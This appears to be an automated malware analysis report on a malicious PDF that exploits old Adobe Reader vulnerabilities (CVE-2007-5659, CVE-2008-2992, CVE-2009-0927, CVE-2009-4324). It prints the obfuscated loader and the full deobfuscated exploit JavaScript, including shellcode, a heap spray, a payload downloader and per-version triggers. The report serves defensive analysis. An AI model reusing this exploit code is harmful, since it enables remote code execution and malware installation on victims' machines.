PDF / .TXT malware analysis — malicious · 79d4189f54c1d186

MALICIOUS

PDF / .TXT

4.4 KB Authoring application: Poqojamilgotopizo

MD5: 85a966d2edd630949034f5ca9a17f6cb SHA-1: dabfcad64688f6cdaf1c1ac31f13045f40d17e40 SHA-256: 79d4189f54c1d18660375ec6140d427cdcfa9b5db6aa419c5a9f685a8427f8f4

408 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that is XOR-decoded from text streams within the document. This JavaScript exploits several known Adobe Reader vulnerabilities to achieve code execution. The deobfuscated JavaScript then constructs a URL and downloads a second-stage payload, likely a Windows executable.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 9

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992

PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0010_000.js` `eae5114a7f3a5b345840fda662fe69175d90ed9bf9b218d51024cf00eee4b636`	pdf-javascript-stream	PDF /JS object 10 at offset 0xC0B	1585 bytes
Preview script First 1,000 lines of the extracted script var sdrt = [ "" , "ev" , "al" ]; unlock = new String ( sdrt [ 1 ] + sdrt [ 2 ] + sdrt [ 0 ] ) ; var check = String ; var sdftuf = [ "a" , "p" , "" , "p" ]; checkU = new String ( sdftuf [ 0 ] + sdftuf [ 1 ] + sdftuf [ 1 ] + sdftuf [ 2 ] ) ; var readerAdobe = 148 ; var d = 1 ; var sdrtSdfj = "" ; var emailAdobe = String("9i5getP".substr(3)+"ageNZ2OR".substr(0,4)+"OtAumWotOA".substr(3,4)+"MZfrdsMZf".substr(3,3)) ; function unlockReader ( cFoxit , b ) { return cFoxit ^ b ; } var send = "uneszO7g".substr(0,4)+"cape2dm4".substr(0,4) ; var adobe = new String("fromCP7F2".substr(0,5)+"nRYharCo".substr(3)+"de") ; var window = String("EpRgetP".substr(3)+"BWyageN".substr(3)+"PE4thWoE4P".substr(3,4)+"gnirdgni".substr(3,2)) ; var bC = "charLw9q".substr(0,4)+"WKUCodeUKW".substr(3,4)+"At" ; var dsjkgCheck = "subs540D".substr(0,4)+"tr" ; var sdftufReader = this ; var sdfjFsdf = String("%") ; var checkSdfj = 0 ; var getB = 62-60 ; var checkU = sdftufReader [ checkU ] ; var sdftufDsjkg = sdftufReader [ emailAdobe ] ( d ) ; var editD = sdftufReader [ unlock ] ; var checkSdfjh = sdftufReader [ send ] ; for ( var readerB = checkSdfj ; readerB < sdftufDsjkg ; readerB++ ) { sendReader = sdftufReader [ window ] ( d , readerB ) ; var uSend = sendReader [ dsjkgCheck ] ( sendReader . length - getB , getB ) ; var sdsdf = sdfjFsdf + uSend ; var foxit = checkSdfjh ( sdsdf ) ; var sdrtU = foxit [ bC ] ( checkSdfj ) ; var emailAdobeU = unlockReader ( sdrtU , readerAdobe ) ; sdrtSdfj += check [ adobe ] ( emailAdobeU ) ; } editD ( sdrtSdfj ) ;
`page_word_xor_stage_000.js` `722c54c3c5c7b22f4031e3fb1c9fda68385bbc1a8d6c9e07f88135415cf172d7`	deobfuscated-js	page-word hex-tail XOR decoded JavaScript (decompressed, key=0x94) at offset 0x1CC	3218 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%"; var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U"; var hwTl9Dn = new Array(); function get_shellcode(name) { var u = get_url(); var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455"; s+= u; return unescape(s); } function get_url(){ var str = this.info.author; var ret = encode_str(str, dest_table, src_table); return ret; }; function encode_str(str, src_table, dest_table){ var ret=""; for(var i=0; i < str.length; i++) { var index = src_table.indexOf(str[i]); if(index > -1 ) { ret += dest_table[index]; } } return ret; }; function Rq4v1qCC(PDrScZj4, ez5pL6){ while (PDrScZj4.length * 2 < ez5pL6){ PDrScZj4 += PDrScZj4; } PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4; } function x8EvTm(I7T0vko5){ var qPBt7D = 0x0c0c0c0c; NRjjR6W6 = get_shellcode("pdf"); if (I7T0vko5 == 1){qPBt7D = 0x30303030;} var FeQq1Vv = 0x400000; var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38); var PDrScZj4 = unescape("%u9090%u9090"); PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6); var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv; for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){ hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6; } } function U2UcYKr(){ var IyIFVe = app.viewerVersion.toString(); if (IyIFVe > 8) { x8EvTm(1); var iVvCdy8 = "12999999999999999999"; for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ) { iVvCdy8 += "8"; } util.printf("%45000f", iVvCdy8); } if (IyIFVe < 8){ x8EvTm(0); var UNXaCTHb = unescape("%u0c0c%u0c0c"); while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb}); } if (IyIFVe < 9.1){ if (app.doc.Collab.getIcon) { x8EvTm(0); var eGREUTNw = unescape("%09"); while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw; eGREUTNw = "N." + eGREUTNw; app.doc.Collab.getIcon(eGREUTNw); } } if (IyIFVe == 9.2){ x8EvTm(1); util.printd("1.000000000.000000000.1337 : 3.13.37", new Date()); try { media.newPlayer(null); } catch(e) {} util.printd("1.000000000.000000000.1337 : 3.13.37", new Date()); } } U2UcYKr();

Open this report in the interactive analyzer, or submit your own file for analysis.